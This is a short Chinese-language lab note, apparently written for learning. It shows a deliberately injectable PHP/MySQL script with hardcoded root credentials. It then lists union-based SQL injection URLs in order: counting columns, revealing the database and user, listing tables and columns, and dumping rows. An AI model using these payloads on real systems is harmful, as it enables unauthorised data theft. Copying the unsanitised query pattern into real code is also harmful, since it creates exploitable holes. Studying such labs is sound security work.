數據表ganyuan  后端代碼 ``` $id=$_GET['id']; var_dump($id); $query="select * from ganyuan where id=$id"; echo "<br>"; echo $query; $link=mysqli_connect("localhost","root","root",$dbname = "test"); mysqli_select_db($link,'test'); if ($res=mysqli_query($link,$query)) { $rows=mysqli_fetch_array($res);//MYSQLI_ASSOC，MYSQLI_NUM或MYSQLI_BOTH; var_dump($rows); }else{ echo $res.'|||'; } ``` 1、orderby確定列數（超過9不會返回數據，所以確定該表9列） ``` http://www.test.com/audit/sql.php?id=1%20order%20by%209 http://www.test.com/audit/sql.php?id=1%20union%20select%201,2,3,4,5,6,7,8,9; ``` 查出數據庫名以及mysql用戶名 ``` http://www.test.com/audit/sql.php?id=-1%20union%20select%20/*!database()*/,/*!user()*/,3,4,5,6,7,8,9; ```  查出表名 原sql查詢單條數據的時候，默認返回的是第一個表名，如果需要查詢其他的表名則可以通過添加limit 0,1 ~limit n,1來實現 ``` http://www.test.com/audit/sql.php?id=-1%20union%20select%201,table_name,3,4,5,6,7,8,9%20from%20information_schema.tables%20where%20table_schema%20=%20%27test%27; ```  ``` http://www.test.com/audit/sql.php?id=-1%20union%20select%201,table_name,3,4,5,6,7,8,9%20from%20information_schema.tables%20where%20table_schema%20=%20%27test%27%20limit%203,1; ```  根據表查詢表有哪些字段（通過加limit 0,1 ~ limit 8,1） ``` http://www.test.com/audit/sql.php?id=-1%20union%20select%201,column_name,3,4,5,6,7,8,9%20from%20information_schema.columns%20where%20table_schema%20=%20%27test%27%20and%20table_name=%27ganyuan%27%20limit%208,1; ```  ``` http://www.test.com/audit/sql.php?id=-1%20union%20select%201,concat_ws(char(32,58,32),id,name,sex,star,pos,url,seniority,profession),3,4,5,6,7,8,9%20from%20ganyuan%20limit%202,1; ```